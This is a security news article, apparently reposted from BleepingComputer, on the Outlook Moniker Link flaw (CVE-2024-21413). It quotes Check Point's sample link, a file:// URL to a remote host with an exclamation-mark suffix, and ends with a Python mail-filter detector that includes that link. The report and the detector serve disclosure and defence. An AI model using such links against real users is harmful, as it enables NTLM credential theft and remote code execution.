Update February 14, 16:50 EST: Article and title revised after Microsoft retracted the “active exploitation” update added to the CVE-2024-21413 advisory.
Microsoft says remote unauthenticated attackers can trivially exploit a critical Outlook security vulnerability that also lets them bypass the Office Protected View.
Discovered by Check Point vulnerability researcher Haifei Li and tracked as CVE-2024-21413, this bug leads to remote code execution (RCE) when opening emails with malicious links using a vulnerable Microsoft Outlook version.
This happens because the flaw also enables attackers to bypass the Protected View (designed to block harmful content embedded in Office files by opening them in read-only mode) and open malicious Office files in editing mode.
Redmond also warned that the Preview Pane is an attack vector for this security flaw, allowing successful exploitation even when previewing maliciously crafted Office documents.
Unauthenticated attackers can exploit CVE-2024-21413 remotely in low-complexity attacks that don’t require user interaction.
“An attacker who successfully exploited this vulnerability could gain high privileges, which include read, write, and delete functionality,” Microsoft explains.
“An attacker could craft a malicious link that bypasses the Protected View Protocol, which leads to the leaking of local NTLM credential information and remote code execution (RCE).”
CVE-2024-21413 affects multiple Office products, including Microsoft Office LTSC 2021 and Microsoft 365 Apps for Enterprise, as well as Microsoft Outlook 2016 and Microsoft Office 2019 (under extended support).
Exclamation mark to bypass Outlook protections
As explained by Check Point in a report published today, the vulnerability they dubbed Moniker Link allows attackers to bypass built-in Outlook protections for malicious links embedded in emails using the file:// protocol and adding an exclamation mark to URLs pointing to attacker-controlled servers.
The exclamation mark is added right after the document extension, together with some random text (in their example, Check Point used “something”), as shown below:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
This type of hyperlink bypasses Outlook security restrictions, and Outlook will access the “\\10.10.111.111\test\test.rtf” remote resource when the link is clicked…
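A mail-filtering check for the link shape described above, as an added example (not code from Check Point, Microsoft or this article). The function name, the regular expression and the sample message body are constructed for illustration, and the pattern covers only the file:// plus exclamation-mark form the article describes.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# file: scheme, any run of slashes/backslashes, a remote host, then a path
# whose file extension is immediately followed by "!" and more text.
# The host may not contain ":" so local drive paths (C:\...) are not flagged.
MONIKER_RE = re.compile(
    r"^file:[/\\]*(?P<host>[^/\\!:]+)[/\\](?P<path>[^!]*\.\w{1,8})!(?P<suffix>.*)$",
    re.IGNORECASE,
)


class _HrefCollector(HTMLParser):
    """Collects the href value of every <a> tag in an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs += [v for k, v in attrs if k == "href" and v]


def find_moniker_links(html_body):
    """Return (host, path, suffix) for each href shaped like a Moniker Link."""
    collector = _HrefCollector()
    collector.feed(html_body)
    hits = []
    for href in collector.hrefs:
        # Normalise percent-encoding before matching.
        m = MONIKER_RE.match(unquote(href.strip()))
        if m:
            hits.append((m["host"], m["path"], m["suffix"]))
    return hits


# Constructed sample body: the article's link plus two links that must not match.
SAMPLE = r'''
<p><a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a></p>
<p><a href="file:///\\fileserver\share\report.docx">plain UNC link</a></p>
<p><a href="https://example.com/a.rtf!x">not a file: link</a></p>
'''

if __name__ == "__main__":
    for host, path, suffix in find_moniker_links(SAMPLE):
        print(f"moniker-style link: host={host} path={path} suffix={suffix}")
```

A hit identifies the remote host Outlook would contact, which is the value to quarantine on or to correlate with outbound SMB traffic.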
Click Here to Read the Full Original Article at BleepingComputer…